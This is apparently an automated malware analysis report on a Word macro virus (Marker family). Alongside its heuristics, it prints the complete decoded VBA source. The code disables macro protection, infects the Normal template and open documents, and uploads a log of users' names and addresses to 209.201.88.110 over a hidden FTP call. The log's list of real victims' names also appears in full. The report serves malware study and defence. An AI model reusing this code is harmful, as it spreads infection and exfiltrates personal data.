Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 22374fe45218ac92…

MALICIOUS

Office (OLE)

93.0 KB Created: 2012-06-07 14:57:00 Authoring application: Microsoft Office Word First seen: 2015-09-18
MD5: 4bcc20249bf82a16205cf57519d92ea0 SHA-1: 66aabf90325e24f9785bd873f66cf6352706d5c5 SHA-256: 22374fe45218ac921fc49fb2dec679466efd164d2572b15e5757e7a2f52e47bd
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.005 Mark-of-the-Web Bypass T1037.001 Boot or Logon Initialization: Script-based

The sample contains VBA macros that are designed to disable macro protection and potentially replicate themselves, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic. The script also attempts to write to a log file at 'c:\hsf*.sys' and a file named 'c:\netldx.vxd' which contains an IP address '209.201.88.110', suggesting it may be part of a downloader or a propagation mechanism. The presence of these malicious behaviors leads to a high confidence assessment.

Heuristics 5

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7085 bytes
SHA-256: 9742de6c9bae1d84d884bd2085a34874685e222c95bcfe45c44ae7e1bb9b1e73
Detection
ClamAV: Doc.Trojan.Marker-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub

' Logfile -->

' 09:08:36  - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'



' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'



' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'



' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'



' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'



' 03:28:02 PM - Wednesday, 6 Jan 1999
' BCBSA
'



' 02:59:47 PM - Monday, 11 Jan 1999
' Marsha Veach
'



' 01:54:54 PM - Wednesday, 20 Jan 1999
' Connie Sandifer, CMP
'



' 09:33:06 PM - Monday, 25 Jan 1999
' Doug Rowan
'



' 08:21:12 AM - Wednesday, 27 Jan 1999
' IMSI
'



' 10:59:58 AM - Friday, 29 Jan 1999
' Raj
'



' 03:37:57 PM - Saturday, 30 Jan 1999
' hornd
'



' 01:26:48 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'



' 04:57:29 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'



' 06:35:44 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'



' 04:23:52 PM - Thursday, 4 Feb 1999
' Cooley Godward
'



' 04:27:39 PM - Saturday, 6 Feb 1999
' Cooley Godward
'



' 06:18:06 PM - Monday, 8 Feb 1999
' Cooley Godward
'



' 09:17:17 PM - Tuesday, 9 Feb 1999
' hclee
'



' 04:44:45 PM - Wednesday, 17 Feb 1999
' Dr. W. Hsiao
'                   Wendy Hsiao, Ph.D.



' 04:13:19 PM - Tuesday, 23 Feb 1999
' CCST
'



' 10:09:35 AM - Saturday, 20 Mar 1999
' cpwu
'



' 09:33:49 AM - Thursday, 6 May 1999
' 柳建华
'



' 12:39:25 PM - Tuesday, 20 May 1997
' ghc-bbc
'



' 01:21:36 PM - Friday, 7 May 1999
' 李晋闽
'



' 05:51:53  - Wednesday, 12 May 1999
' qdzhuang
'



' 03:23:04 PM - Saturday, 19 Jun 1999
' 李晋闽
'



' 02:53:46 下午 - Tuesday, 6 Sep 2011
' 李晋闽
'



' 09:37:47 上午 - Monday, 19 Sep 2011
' 张士力
'



' 01:41:54 下午 - Monday, 26 Sep 2011
' unknown
'



' 10:50:02 上午 - Wednesday, 19 Oct 2011
' 祝昊泉
'



' 08:27:05 上午 - Wednesday, 26 Oct 2011
' 迟文倩
'



' 10:37:36 上午 - Monday, 31 Oct 2011
' 蒋运枫
'



' 04:21:38 下午 - Monday, 31 Oct 2011
' 李彩梅
'



' 08:15:53 上午 - Wednesday, 2 Nov 2011
' 张会芳
'



' 02:57:58 下午 - Thursday, 3 Nov 2011
' unknown
'



' 04:00:59 下午 - Thursday, 3 Nov 2011
' 田敏
'



' 09:41:48 上午 - Friday, 4 Nov 2011
' 钟虹
'



' 11:18:07 上午 - Monday, 7 Nov 2011
' unknown
'



' 03:01:17 下午 - Monday, 21 Nov 2011
' unknown
'



' 09:59:34 上午 - Wednesday, 28 Dec 2011
' unknown
'



' 11:26:57 上午 - Wednesday, 22 Feb 2012
' unknown
'



' 09:22:07 上午 - Monday, 30 Apr 2012
' 梁小兵
'



' 10:07:34 上午 - Monday, 7 May 2012
' 20068726
'



' 11:29:21 上午 - Friday, 1 Jun 2012
' 20066938
'



' 12:54:51 下午 - Friday, 1 Jun 2012
' 20065518
'



' 04:09:36 下午 - Saturday, 2 Jun 2012
' 20069224
'



' 08:46:21 上午 - Monday, 4 Jun 2012
' 微软用户
'



' 10:18:29 上午 - Tuesday, 5 Jun 2012
' 20066990
'



' 12:03:38 下午 - Tuesday, 19 Jun 2012
' 20066413
'

Open this report in the interactive analyzer, or submit your own file for analysis.